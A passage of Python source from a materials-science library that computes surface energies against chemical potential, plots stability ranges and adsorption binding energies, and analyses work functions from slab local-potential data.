Symbol(\"delu_el\") where el is the name of the element.\n\n Returns:\n array: Array containing a solution to x equations with x\n variables (x-1 chemical potential and 1 surface energy)\n \"\"\"\n # Generate all possible coefficients\n all_parameters = []\n all_eqns = []\n for slab_entry in slab_entries:\n se = self.surfe_dict[slab_entry]\n\n # remove the free chempots we wish to keep constant and\n # set the equation to 0 (subtract gamma from both sides)\n if type(se).__name__ == \"float\":\n all_eqns.append(se - Symbol(\"gamma\"))\n else:\n se = sub_chempots(se, delu_dict) if delu_dict else se\n all_eqns.append(se - Symbol(\"gamma\"))\n all_parameters.extend([p for p in list(se.free_symbols) if p not in all_parameters])\n\n all_parameters.append(Symbol(\"gamma\"))\n # Now solve the system of linear eqns to find the chempot\n # where the slabs are at equilibrium with each other\n\n soln = linsolve(all_eqns, all_parameters)\n if not soln:\n warnings.warn(\"No solution\")\n return soln\n return {p: next(iter(soln))[i] for i, p in enumerate(all_parameters)}\n\n def stable_u_range_dict(\n self,\n chempot_range,\n ref_delu,\n no_doped=True,\n no_clean=False,\n delu_dict=None,\n miller_index=(),\n dmu_at_0=False,\n return_se_dict=False,\n ):\n \"\"\"\n Creates a dictionary where each entry is a key pointing to a\n chemical potential range where the surface of that entry is stable.\n Does so by enumerating through all possible solutions (intersect)\n for surface energies of a specific facet.\n\n Args:\n chempot_range ([max_chempot, min_chempot]): Range to consider the\n stability of the slabs.\n ref_delu (sympy Symbol): The range stability of each slab is based\n on the chempot range of this chempot. Should be a sympy Symbol\n object of the format: Symbol(\"delu_el\") where el is the name of\n the element\n no_doped (bool): Consider stability of clean slabs only.\n no_clean (bool): Consider stability of doped slabs only.\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n miller_index (list): Miller index for a specific facet to get a\n dictionary for.\n dmu_at_0 (bool): If True, if the surface energies corresponding to\n the chemical potential range is between a negative and positive\n value, the value is a list of three chemical potentials with the\n one in the center corresponding a surface energy of 0. Uselful\n in identifying unphysical ranges of surface energies and their\n chemical potential range.\n return_se_dict (bool): Whether or not to return the corresponding\n dictionary of surface energies\n \"\"\"\n if delu_dict is None:\n delu_dict = {}\n chempot_range = sorted(chempot_range)\n stable_urange_dict, se_dict = {}, {}\n\n # Get all entries for a specific facet\n for hkl in self.all_slab_entries:\n entries_in_hkl = []\n # Skip this facet if this is not the facet we want\n if miller_index and hkl != tuple(miller_index):\n continue\n if not no_clean:\n entries_in_hkl.extend(self.all_slab_entries[hkl])\n if not no_doped:\n for entry in self.all_slab_entries[hkl]:\n entries_in_hkl.extend(self.all_slab_entries[hkl][entry])\n\n for entry in entries_in_hkl:\n stable_urange_dict[entry] = []\n se_dict[entry] = []\n # if there is only one entry for this facet, then just give it the\n # default urange, you can't make combinations with just 1 item\n if len(entries_in_hkl) == 1:\n stable_urange_dict[entries_in_hkl[0]] = chempot_range\n u1, u2 = delu_dict.copy(), delu_dict.copy()\n u1[ref_delu], u2[ref_delu] = chempot_range[0], chempot_range[1]\n se = self.as_coeffs_dict[entries_in_hkl[0]]\n se_dict[entries_in_hkl[0]] = [\n sub_chempots(se, u1),\n sub_chempots(se, u2),\n ]\n continue\n\n for pair in itertools.combinations(entries_in_hkl, 2):\n # I'm assuming ref_delu was not set in delu_dict,\n # so the solution should be for ref_delu\n solution = self.get_surface_equilibrium(pair, delu_dict=delu_dict)\n\n # Check if this solution is stable\n if not solution:\n continue\n new_delu_dict = delu_dict.copy()\n new_delu_dict[ref_delu] = solution[ref_delu]\n stable_entry, gamma = self.get_stable_entry_at_u(\n hkl, new_delu_dict, no_doped=no_doped, no_clean=no_clean\n )\n if stable_entry not in pair:\n continue\n\n # Now check if the solution is within the chempot range\n if not chempot_range[0] <= solution[ref_delu] <= chempot_range[1]:\n continue\n\n for entry in pair:\n stable_urange_dict[entry].append(solution[ref_delu])\n se_dict[entry].append(gamma)\n\n # Now check if all entries have 2 chempot values. If only\n # one, we need to set the other value as either the upper\n # limit or lower limit of the user provided chempot_range\n new_delu_dict = delu_dict.copy()\n for u in chempot_range:\n new_delu_dict[ref_delu] = u\n entry, gamma = self.get_stable_entry_at_u(\n hkl, delu_dict=new_delu_dict, no_doped=no_doped, no_clean=no_clean\n )\n stable_urange_dict[entry].append(u)\n se_dict[entry].append(gamma)\n\n if dmu_at_0:\n for entry, v in se_dict.items():\n # if se are of opposite sign, determine chempot when se=0.\n # Useful for finding a chempot range where se is unphysical\n if not stable_urange_dict[entry]:\n continue\n if v[0] * v[1] < 0:\n # solve for gamma=0\n se = self.as_coeffs_dict[entry]\n v.append(0)\n stable_urange_dict[entry].append(solve(sub_chempots(se, delu_dict), ref_delu)[0])\n\n # sort the chempot ranges for each facet\n for entry, v in stable_urange_dict.items():\n se_dict[entry] = [se for i, se in sorted(zip(v, se_dict[entry]))]\n stable_urange_dict[entry] = sorted(v)\n\n if return_se_dict:\n return stable_urange_dict, se_dict\n return stable_urange_dict\n\n def color_palette_dict(self, alpha=0.35):\n \"\"\"\n Helper function to assign each facet a unique color using a dictionary.\n\n Args:\n alpha (float): Degree of transparency\n\n return (dict): Dictionary of colors (r,g,b,a) when plotting surface\n energy stability. The keys are individual surface entries where\n clean surfaces have a solid color while the corresponding adsorbed\n surface will be transparent.\n \"\"\"\n color_dict = {}\n for hkl in self.all_slab_entries:\n rgb_indices = [0, 1, 2]\n color = [0, 0, 0, 1]\n random.shuffle(rgb_indices)\n for i, ind in enumerate(rgb_indices):\n if i == 2:\n break\n color[ind] = np.random.uniform(0, 1)\n\n # Get the clean (solid) colors first\n clean_list = np.linspace(0, 1, len(self.all_slab_entries[hkl]))\n for i, clean in enumerate(self.all_slab_entries[hkl]):\n c = copy.copy(color)\n c[rgb_indices[2]] = clean_list[i]\n color_dict[clean] = c\n\n # Now get the adsorbed (transparent) colors\n for ads_entry in self.all_slab_entries[hkl][clean]:\n c_ads = copy.copy(c)\n c_ads[3] = alpha\n color_dict[ads_entry] = c_ads\n\n return color_dict\n\n def chempot_vs_gamma_plot_one(\n self,\n ax: plt.Axes,\n entry: SlabEntry,\n ref_delu: Symbol,\n chempot_range: list[float],\n delu_dict: dict[Symbol, float] | None = None,\n delu_default: float = 0,\n label: str = \"\",\n JPERM2: bool = False,\n ) -> plt.Axes:\n \"\"\"\n Helper function to help plot the surface energy of a\n single SlabEntry as a function of chemical potential.\n\n Args:\n ax (plt.Axes): Matplotlib Axes instance for plotting.\n entry: Entry of the slab whose surface energy we want\n to plot. (Add appropriate description for type)\n ref_delu (Symbol): The range stability of each slab is based\n on the chempot range of this chempot.\n chempot_range (list[float]): Range to consider the stability of the slabs.\n delu_dict (dict[Symbol, float]): Dictionary of the chemical potentials.\n delu_default (float): Default value for all unset chemical potentials.\n label (str): Label of the slab for the legend.\n JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or\n eV/A^2 (False).\n\n Returns:\n plt.Axes: Plot of surface energy vs chemical potential for one entry.\n \"\"\"\n delu_dict = delu_dict or {}\n chempot_range = sorted(chempot_range)\n\n # use dashed lines for slabs that are not stoichiometric\n # wrt bulk. Label with formula if non-stoichiometric\n ucell_comp = self.ucell_entry.composition.reduced_composition\n if entry.adsorbates:\n s = entry.cleaned_up_slab\n clean_comp = s.composition.reduced_composition\n else:\n clean_comp = entry.composition.reduced_composition\n\n mark = \"--\" if ucell_comp != clean_comp else \"-\"\n\n delu_dict = self.set_all_variables(delu_dict, delu_default)\n delu_dict[ref_delu] = chempot_range[0] # type: ignore\n gamma_min = self.as_coeffs_dict[entry]\n gamma_min = gamma_min if type(gamma_min).__name__ == \"float\" else sub_chempots(gamma_min, delu_dict)\n delu_dict[ref_delu] = chempot_range[1] # type: ignore\n gamma_max = self.as_coeffs_dict[entry]\n gamma_max = gamma_max if type(gamma_max).__name__ == \"float\" else sub_chempots(gamma_max, delu_dict)\n gamma_range = [gamma_min, gamma_max]\n\n se_range = np.array(gamma_range) * EV_PER_ANG2_TO_JOULES_PER_M2 if JPERM2 else gamma_range\n\n mark = entry.mark if entry.mark else mark\n c = entry.color if entry.color else self.color_dict[entry]\n return plt.plot(chempot_range, se_range, mark, color=c, label=label)\n\n def chempot_vs_gamma(\n self,\n ref_delu,\n chempot_range,\n miller_index=(),\n delu_dict=None,\n delu_default=0,\n JPERM2=False,\n show_unstable=False,\n ylim=None,\n plt=None,\n no_clean=False,\n no_doped=False,\n use_entry_labels=False,\n no_label=False,\n ):\n \"\"\"\n Plots the surface energy as a function of chemical potential.\n Each facet will be associated with its own distinct colors.\n Dashed lines will represent stoichiometries different from that\n of the mpid's compound. Transparent lines indicates adsorption.\n\n Args:\n ref_delu (sympy Symbol): The range stability of each slab is based\n on the chempot range of this chempot. Should be a sympy Symbol\n object of the format: Symbol(\"delu_el\") where el is the name of\n the element\n chempot_range ([max_chempot, min_chempot]): Range to consider the\n stability of the slabs.\n miller_index (list): Miller index for a specific facet to get a\n dictionary for.\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or\n eV/A^2 (False)\n show_unstable (bool): Whether or not to show parts of the surface\n energy plot outside the region of stability.\n ylim ([ymax, ymin]): Range of y axis\n no_doped (bool): Whether to plot for the clean slabs only.\n no_clean (bool): Whether to plot for the doped slabs only.\n use_entry_labels (bool): If True, will label each slab configuration\n according to their given label in the SlabEntry object.\n no_label (bool): Option to turn off labels.\n\n Returns:\n Plot: Plot of surface energy vs chempot for all entries.\n \"\"\"\n if delu_dict is None:\n delu_dict = {}\n chempot_range = sorted(chempot_range)\n\n plt = plt if plt else pretty_plot(width=8, height=7)\n axes = plt.gca()\n\n for hkl in self.all_slab_entries:\n if miller_index and hkl != tuple(miller_index):\n continue\n # Get the chempot range of each surface if we only\n # want to show the region where each slab is stable\n if not show_unstable:\n stable_u_range_dict = self.stable_u_range_dict(\n chempot_range, ref_delu, no_doped=no_doped, delu_dict=delu_dict, miller_index=hkl\n )\n\n already_labelled = []\n label = \"\"\n for clean_entry in self.all_slab_entries[hkl]:\n urange = stable_u_range_dict[clean_entry] if not show_unstable else chempot_range\n # Don't plot if the slab is unstable, plot if it is.\n if urange != []:\n label = clean_entry.label\n if label in already_labelled:\n label = None\n else:\n already_labelled.append(label)\n if not no_clean:\n if use_entry_labels:\n label = clean_entry.label\n if no_label:\n label = \"\"\n plt = self.chempot_vs_gamma_plot_one(\n plt,\n clean_entry,\n ref_delu,\n urange,\n delu_dict=delu_dict,\n delu_default=delu_default,\n label=label,\n JPERM2=JPERM2,\n )\n if not no_doped:\n for ads_entry in self.all_slab_entries[hkl][clean_entry]:\n # Plot the adsorbed slabs\n # Generate a label for the type of slab\n urange = stable_u_range_dict[ads_entry] if not show_unstable else chempot_range\n if urange != []:\n if use_entry_labels:\n label = ads_entry.label\n if no_label:\n label = \"\"\n plt = self.chempot_vs_gamma_plot_one(\n plt,\n ads_entry,\n ref_delu,\n urange,\n delu_dict=delu_dict,\n delu_default=delu_default,\n label=label,\n JPERM2=JPERM2,\n )\n\n # Make the figure look nice\n plt.ylabel(r\"Surface energy (J/$m^{2}$)\") if JPERM2 else plt.ylabel(r\"Surface energy (eV/$\\AA^{2}$)\")\n return self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split(\"_\")[1], axes, ylim=ylim)\n\n def monolayer_vs_BE(self, plot_eads=False):\n \"\"\"\n Plots the binding energy as a function of monolayers (ML), i.e.\n the fractional area adsorbate density for all facets. For each\n facet at a specific monolayer, only plot the lowest binding energy.\n\n Args:\n plot_eads (bool): Option to plot the adsorption energy (binding\n energy multiplied by number of adsorbates) instead.\n\n Returns:\n Plot: Plot of binding energy vs monolayer for all facets.\n \"\"\"\n ax = pretty_plot(width=8, height=7)\n for hkl in self.all_slab_entries:\n ml_be_dict = {}\n for clean_entry in self.all_slab_entries[hkl]:\n if self.all_slab_entries[hkl][clean_entry]:\n for ads_entry in self.all_slab_entries[hkl][clean_entry]:\n if ads_entry.get_monolayer not in ml_be_dict:\n ml_be_dict[ads_entry.get_monolayer] = 1000\n be = ads_entry.gibbs_binding_energy(eads=plot_eads)\n if be < ml_be_dict[ads_entry.get_monolayer]:\n ml_be_dict[ads_entry.get_monolayer] = be\n # sort the binding energies and monolayers\n # in order to properly draw a line plot\n vals = sorted(ml_be_dict.items())\n monolayers, BEs = zip(*vals)\n ax.plot(monolayers, BEs, \"-o\", c=self.color_dict[clean_entry], label=hkl)\n\n adsorbates = tuple(ads_entry.ads_entries_dict)\n ax.set_xlabel(f\"{' '.join(adsorbates)} Coverage (ML)\")\n ax.set_ylabel(\"Adsorption Energy (eV)\" if plot_eads else \"Binding Energy (eV)\")\n ax.legend()\n plt.tight_layout()\n return ax\n\n @staticmethod\n def chempot_plot_addons(ax, xrange, ref_el, pad=2.4, rect=None, ylim=None):\n \"\"\"\n Helper function to a chempot plot look nicer.\n\n Args:\n plt (Plot) Plot to add things to.\n xrange (list): xlim parameter\n ref_el (str): Element of the referenced chempot.\n axes(axes) Axes object from matplotlib\n pad (float) For tight layout\n rect (list): For tight layout\n ylim (ylim parameter):\n\n return (Plot): Modified plot with addons.\n return (Plot): Modified plot with addons.\n \"\"\"\n # Make the figure look nice\n plt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.0)\n ax.set_xlabel(rf\"Chemical potential $\\Delta\\mu_{{{ref_el}}}$ (eV)\")\n\n ylim = ylim or ax.get_ylim()\n plt.xticks(rotation=60)\n plt.ylim(ylim)\n xlim = ax.get_xlim()\n plt.xlim(xlim)\n plt.tight_layout(pad=pad, rect=rect or [-0.047, 0, 0.84, 1])\n plt.plot([xrange[0], xrange[0]], ylim, \"--k\")\n plt.plot([xrange[1], xrange[1]], ylim, \"--k\")\n xy = [np.mean([xrange[1]]), np.mean(ylim)]\n plt.annotate(f\"{ref_el}-rich\", xy=xy, xytext=xy, rotation=90, fontsize=17)\n xy = [np.mean([xlim[0]]), np.mean(ylim)]\n plt.annotate(f\"{ref_el}-poor\", xy=xy, xytext=xy, rotation=90, fontsize=17)\n\n return ax\n\n def BE_vs_clean_SE(\n self,\n delu_dict,\n delu_default=0,\n plot_eads=False,\n annotate_monolayer=True,\n JPERM2=False,\n ):\n \"\"\"\n For each facet, plot the clean surface energy against the most\n stable binding energy.\n\n Args:\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n plot_eads (bool): Option to plot the adsorption energy (binding\n energy multiplied by number of adsorbates) instead.\n annotate_monolayer (bool): Whether or not to label each data point\n with its monolayer (adsorbate density per unit primiitve area)\n JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or\n eV/A^2 (False)\n\n Returns:\n Plot: Plot of clean surface energy vs binding energy for\n all facets.\n \"\"\"\n ax = pretty_plot(width=8, height=7)\n for hkl in self.all_slab_entries:\n for clean_entry in self.all_slab_entries[hkl]:\n all_delu_dict = self.set_all_variables(delu_dict, delu_default)\n if self.all_slab_entries[hkl][clean_entry]:\n clean_se = self.as_coeffs_dict[clean_entry]\n se = sub_chempots(clean_se, all_delu_dict)\n for ads_entry in self.all_slab_entries[hkl][clean_entry]:\n ml = ads_entry.get_monolayer\n be = ads_entry.gibbs_binding_energy(eads=plot_eads)\n\n # Now plot the surface energy vs binding energy\n ax.scatter(se, be)\n if annotate_monolayer:\n ax.annotate(f\"{ml:.2f}\", xy=[se, be], xytext=[se, be])\n\n ax.set_xlabel(r\"Surface energy ($J/m^2$)\" if JPERM2 else r\"Surface energy ($eV/\\AA^2$)\")\n ax.set_ylabel(\"Adsorption Energy (eV)\" if plot_eads else \"Binding Energy (eV)\")\n plt.tight_layout()\n ax.set_xticks(rotation=60)\n return ax\n\n def surface_chempot_range_map(\n self,\n elements,\n miller_index,\n ranges,\n incr=50,\n no_doped=False,\n no_clean=False,\n delu_dict=None,\n ax=None,\n annotate=True,\n show_unphyiscal_only=False,\n fontsize=10,\n ) -> plt.Axes:\n \"\"\"\n Adapted from the get_chempot_range_map() method in the PhaseDiagram\n class. Plot the chemical potential range map based on surface\n energy stability. Currently works only for 2-component PDs. At\n the moment uses a brute force method by enumerating through the\n range of the first element chempot with a specified increment\n and determines the chempot rangeo fht e second element for each\n SlabEntry. Future implementation will determine the chempot range\n map first by solving systems of equations up to 3 instead of 2.\n\n Args:\n elements (list): Sequence of elements to be considered as independent\n variables. E.g., if you want to show the stability ranges of\n all Li-Co-O phases wrt to duLi and duO, you will supply\n [Element(\"Li\"), Element(\"O\")]\n miller_index ([h, k, l]): Miller index of the surface we are interested in\n ranges ([[range1], [range2]]): List of chempot ranges (max and min values)\n for the first and second element.\n incr (int): Number of points to sample along the range of the first chempot\n no_doped (bool): Whether or not to include doped systems.\n no_clean (bool): Whether or not to include clean systems.\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n ax (plt.Axes): Axes object to plot on. If None, will create a new plot.\n annotate (bool): Whether to annotate each \"phase\" with the label of\n the entry. If no label, uses the reduced formula\n show_unphyiscal_only (bool): Whether to only show the shaded region where\n surface energy is negative. Useful for drawing other chempot range maps.\n fontsize (int): Font size of the annotation\n \"\"\"\n # Set up\n delu_dict = delu_dict or {}\n ax = ax if ax else pretty_plot(12, 8)\n el1, el2 = str(elements[0]), str(elements[1])\n delu1 = Symbol(f\"delu_{elements[0]}\")\n delu2 = Symbol(f\"delu_{elements[1]}\")\n range1 = ranges[0]\n range2 = ranges[1]\n\n # Find a range map for each entry (surface). This part is very slow, will\n # need to implement a more sophisticated method of getting the range map\n vertices_dict: dict[SlabEntry, list] = {}\n for dmu1 in np.linspace(range1[0], range1[1], incr):\n # Get chemical potential range of dmu2 for each increment of dmu1\n new_delu_dict = delu_dict.copy()\n new_delu_dict[delu1] = dmu1\n range_dict, se_dict = self.stable_u_range_dict(\n range2,\n delu2,\n dmu_at_0=True,\n miller_index=miller_index,\n no_doped=no_doped,\n no_clean=no_clean,\n delu_dict=new_delu_dict,\n return_se_dict=True,\n )\n\n # Save the chempot range for dmu1 and dmu2\n for entry, vertex in range_dict.items():\n if not vertex:\n continue\n vertices_dict.setdefault(entry, [])\n\n selist = se_dict[entry]\n vertices_dict[entry].append({delu1: dmu1, delu2: [vertex, selist]})\n\n # Plot the edges of the phases\n for entry, vertex in vertices_dict.items():\n xvals, yvals = [], []\n\n # Plot each edge of a phase within the borders\n for ii, pt1 in enumerate(vertex):\n # Determine if the surface energy at this lower range\n # of dmu2 is negative. If so, shade this region.\n if len(pt1[delu2][1]) == 3:\n if pt1[delu2][1][0] < 0:\n neg_dmu_range = [pt1[delu2][0][0], pt1[delu2][0][1]]\n else:\n neg_dmu_range = [pt1[delu2][0][1], pt1[delu2][0][2]]\n # Shade the threshold and region at which se<=0\n ax.plot([pt1[delu1], pt1[delu1]], neg_dmu_range, \"k--\")\n elif pt1[delu2][1][0] < 0 and pt1[delu2][1][1] < 0 and not show_unphyiscal_only:\n # Any chempot at this point will result\n # in se<0, shade the entire y range\n ax.plot([pt1[delu1], pt1[delu1]], range2, \"k--\")\n\n if ii == len(vertex) - 1:\n break\n pt2 = vertex[ii + 1]\n if not show_unphyiscal_only:\n ax.plot(\n [pt1[delu1], pt2[delu1]],\n [pt1[delu2][0][0], pt2[delu2][0][0]],\n \"k\",\n )\n\n # Need these values to get a good position for labelling phases\n xvals.extend([pt1[delu1], pt2[delu1]])\n yvals.extend([pt1[delu2][0][0], pt2[delu2][0][0]])\n\n # Plot the edge along the max x value\n pt = vertex[-1]\n delu1, delu2 = pt\n xvals.extend([pt[delu1], pt[delu1]])\n yvals.extend(pt[delu2][0])\n if not show_unphyiscal_only:\n ax.plot([pt[delu1], pt[delu1]], [pt[delu2][0][0], pt[delu2][0][-1]], \"k\")\n\n if annotate:\n # Label the phases\n x = np.mean([max(xvals), min(xvals)])\n y = np.mean([max(yvals), min(yvals)])\n label = entry.label if entry.label else entry.composition.reduced_formula\n ax.annotate(label, xy=[x, y], xytext=[x, y], fontsize=fontsize)\n\n # Label plot\n ax.set(xlim=range1, ylim=range2)\n ax.set_xlabel(rf\"$\\Delta\\mu_{{{el1}}} (eV)$\", fontsize=25)\n ax.set_ylabel(rf\"$\\Delta\\mu_{{{el2}}} (eV)$\", fontsize=25)\n ax.set_xticks(rotation=60)\n\n return ax\n\n def set_all_variables(self, delu_dict, delu_default):\n \"\"\"\n Sets all chemical potential values and returns a dictionary where\n the key is a sympy Symbol and the value is a float (chempot).\n\n Args:\n entry (SlabEntry): Computed structure entry of the slab\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n\n Returns:\n Dictionary of set chemical potential values\n \"\"\"\n # Set up the variables\n all_delu_dict = {}\n for du in self.list_of_chempots:\n if delu_dict and du in delu_dict:\n all_delu_dict[du] = delu_dict[du]\n elif du == 1:\n all_delu_dict[du] = du\n else:\n all_delu_dict[du] = delu_default\n\n return all_delu_dict\n\n\ndef entry_dict_from_list(all_slab_entries):\n \"\"\"\n Converts a list of SlabEntry to an appropriate dictionary. It is\n assumed that if there is no adsorbate, then it is a clean SlabEntry\n and that adsorbed SlabEntry has the clean_entry parameter set.\n\n Args:\n all_slab_entries (list): List of SlabEntry objects\n\n Returns:\n (dict): Dictionary of SlabEntry with the Miller index as the main\n key to a dictionary with a clean SlabEntry as the key to a\n list of adsorbed SlabEntry.\n \"\"\"\n entry_dict = {}\n\n for entry in all_slab_entries:\n hkl = tuple(entry.miller_index)\n if hkl not in entry_dict:\n entry_dict[hkl] = {}\n clean = entry.clean_entry if entry.clean_entry else entry\n if clean not in entry_dict[hkl]:\n entry_dict[hkl][clean] = []\n if entry.adsorbates:\n entry_dict[hkl][clean].append(entry)\n\n return entry_dict\n\n\nclass WorkFunctionAnalyzer:\n \"\"\"\n A class used for calculating the work function from a slab model and\n visualizing the behavior of the local potential along the slab.\n\n Attributes:\n efermi (float): The Fermi energy.\n locpot_along_c (list): Local potential in eV along points along the c axis.\n vacuum_locpot (float): The maximum local potential along the c direction for the slab model,\n i.e. the potential at the vacuum.\n work_function (float): The minimum energy needed to move an electron from the surface to infinity.\n Defined as the difference between the potential at the vacuum and the Fermi energy.\n slab (Slab): The slab structure model.\n along_c (list): Points along the c direction with same increments as the locpot in the c axis.\n ave_locpot (float): Mean of the minimum and maximum (vacuum) locpot along c.\n sorted_sites (list): List of sites from the slab sorted along the c direction.\n ave_bulk_p (float): The average locpot of the slab region along the c direction.\n \"\"\"\n\n def __init__(self, structure: Structure, locpot_along_c, efermi, shift=0, blength=3.5):\n \"\"\"\n Initializes the WorkFunctionAnalyzer class.\n\n Args:\n structure (Structure): Structure object modelling the surface\n locpot_along_c (list): Local potential along the c direction\n outcar (MSONable): Outcar vasp output object\n shift (float): Parameter to translate the slab (and\n therefore the vacuum) of the slab structure, thereby\n translating the plot along the x axis.\n blength (float (Ang)): The longest bond length in the material.\n Used to handle pbc for noncontiguous slab layers\n \"\"\"\n # ensure shift between 0 and 1\n if shift < 0:\n shift += -1 * int(shift) + 1\n elif shift >= 1:\n shift -= int(shift)\n self.shift = shift\n\n # properties that can be shifted\n slab = structure.copy()\n slab.translate_sites([i for i, site in enumerate(slab)], [0, 0, self.shift])\n self.slab = slab\n self.sorted_sites = sorted(self.slab, key=lambda site: site.frac_coords[2])\n\n # Get the plot points between 0 and c\n # increments of the number of locpot points\n self.along_c = np.linspace(0, 1, num=len(locpot_along_c))\n\n # Get the plot points between 0 and c\n # increments of the number of locpot points\n locpot_along_c_mid, locpot_end, locpot_start = [], [], []\n for i, s in enumerate(self.along_c):\n j = s + self.shift\n if j > 1:\n locpot_start.append(locpot_along_c[i])\n elif j < 0:\n locpot_end.append(locpot_along_c[i])\n else:\n locpot_along_c_mid.append(locpot_along_c[i])\n self.locpot_along_c = locpot_start + locpot_along_c_mid + locpot_end\n\n # identify slab region\n self.slab_regions = get_slab_regions(self.slab, blength=blength)\n # get the average of the signal in the bulk-like region of the\n # slab, i.e. the average of the oscillating region. This gives\n # a rough appr. of the potential in the interior of the slab\n bulk_p = []\n for r in self.slab_regions:\n bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if r[1] >= self.along_c[i] > r[0]])\n if len(self.slab_regions) > 1:\n bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[1][1] <= self.along_c[i]])\n bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[0][0] >= self.along_c[i]])\n self.ave_bulk_p = np.mean(bulk_p)\n\n # shift independent quantities\n self.efermi = efermi\n self.vacuum_locpot = max(self.locpot_along_c)\n # get the work function\n self.work_function = self.vacuum_locpot - self.efermi\n # for setting ylim and annotating\n self.ave_locpot = (self.vacuum_locpot - min(self.locpot_along_c)) / 2\n\n def get_locpot_along_slab_plot(self, label_energies=True, plt=None, label_fontsize=10):\n \"\"\"\n Returns a plot of the local potential (eV) vs the\n position along the c axis of the slab model (Ang).\n\n Args:\n label_energies (bool): Whether to label relevant energy\n quantities such as the work function, Fermi energy,\n vacuum locpot, bulk-like locpot\n plt (plt): Matplotlib pyplot object\n label_fontsize (float): Fontsize of labels\n\n Returns plt of the locpot vs c axis\n \"\"\"\n plt = plt if plt else pretty_plot(width=6, height=4)\n\n # plot the raw locpot signal along c\n plt.plot(self.along_c, self.locpot_along_c, \"b--\")\n\n # Get the local averaged signal of the locpot along c\n xg, yg = [], []\n for i, p in enumerate(self.locpot_along_c):\n # average signal is just the bulk-like potential when in the slab region\n in_slab = False\n for r in self.slab_regions:\n if r[0] <= self.along_c[i] <= r[1]:\n in_slab = True\n if len(self.slab_regions) > 1:\n if self.along_c[i] >= self.slab_regions[1][1]:\n in_slab = True\n if self.along_c[i] <= self.slab_regions[0][0]:\n in_slab = True\n\n if in_slab or p < self.ave_bulk_p:\n yg.append(self.ave_bulk_p)\n xg.append(self.along_c[i])\n else:\n yg.append(p)\n xg.append(self.along_c[i])\n xg, yg = zip(*sorted(zip(xg, yg)))\n plt.plot(xg, yg, \"r\", linewidth=2.5, zorder=-1)\n\n # make it look nice\n if label_energies:\n plt = self.get_labels(plt, label_fontsize=label_fontsize)\n plt.xlim([0, 1])\n plt.ylim([min(self.locpot_along_c), self.vacuum_locpot + self.ave_locpot * 0.2])\n plt.xlabel(r\"Fractional coordinates ($\\hat{c}$)\", fontsize=25)\n plt.xticks(fontsize=15, rotation=45)\n plt.ylabel(r\"Potential (eV)\", fontsize=25)\n plt.yticks(fontsize=15)\n\n return plt\n\n def get_labels(self, plt, label_fontsize=10):\n \"\"\"\n Handles the optional labelling of the plot with relevant quantities\n\n Args:\n plt (plt): Plot of the locpot vs c axis\n label_fontsize (float): Fontsize of labels\n Returns Labelled plt.\n \"\"\"\n # center of vacuum and bulk region\n if len(self.slab_regions) > 1:\n label_in_vac = (self.slab_regions[0][1] + self.slab_regions[1][0]) / 2\n if abs(self.slab_regions[0][0] - self.slab_regions[0][1]) > abs(\n self.slab_regions[1][0] - self.slab_regions[1][1]\n ):\n label_in_bulk = self.slab_regions[0][1] / 2\n else:\n label_in_bulk = (self.slab_regions[1][1] + self.slab_regions[1][0]) / 2\n else:\n label_in_bulk = (self.slab_regions[0][0] + self.slab_regions[0][1]) / 2\n if self.slab_regions[0][0] > 1 - self.slab_regions[0][1]:\n label_in_vac = self.slab_regions[0][0] / 2\n else:\n label_in_vac = (1 + self.slab_regions[0][1]) / 2\n\n plt.plot([0, 1], [self.vacuum_locpot] * 2, \"b--\", zorder=-5, linewidth=1)\n xy = [label_in_bulk, self.vacuum_locpot + self.ave_locpot * 0.05]\n plt.annotate(\n f\"$V_{{vac}}={self.vacuum_locpot:.2f}$\",\n xy=xy,\n xytext=xy,\n color=\"b\",\n fontsize=label_fontsize,\n )\n\n # label the fermi energy\n plt.plot([0, 1], [self.efermi] * 2, \"g--\", zorder=-5, linewidth=3)\n xy = [label_in_bulk, self.efermi + self.ave_locpot * 0.05]\n plt.annotate(\n f\"$E_F={self.efermi:.2f}$\",\n xytext=xy,\n xy=xy,\n fontsize=label_fontsize,\n color=\"g\",\n )\n\n # label the bulk-like locpot\n plt.plot([0, 1], [self.ave_bulk_p] * 2, \"r--\", linewidth=1.0, zorder=-1)\n xy = [label_in_vac, self.ave_bulk_p + self.ave_locpot * 0.05]\n plt.annotate(\n f\"$V^{{interior}}_{{slab}}={self.ave_bulk_p:.2f}$\",\n xy=xy,\n xytext=xy,\n color=\"r\",\n fontsize=label_fontsize,\n )\n\n # label the work function as a barrier\n plt.plot(\n [label_in_vac] * 2,\n [self.efermi, self.vacuum_locpot],\n \"k--\",\n zorder=-5,\n linewidth=2,\n )\n xy = [label_in_vac, self.efermi + self.ave_locpot * 0.05]\n plt.annotate(\n rf\"$\\Phi={self.work_function:.2f}$\",\n xy=xy,\n xytext=xy,\n fontsize=label_fontsize,\n )\n\n return plt\n\n def is_converged(self, min_points_frac=0.015, tol: float = 0.0025):\n \"\"\"\n A well converged work function should have a flat electrostatic\n potential within some distance (min_point) about where the peak\n electrostatic potential is found along the c direction of the\n slab. This is dependent on the size of the slab.\n\n Args:\n min_point (fractional coordinates): The number of data points\n +/- the point of where the electrostatic potential is at\n its peak along the c direction.\n tol (float): If the electrostatic potential stays the same\n within this tolerance, within the min_points, it is converged.\n\n Returns a bool (whether or not the work function is converged)\n \"\"\"\n conv_within = tol * 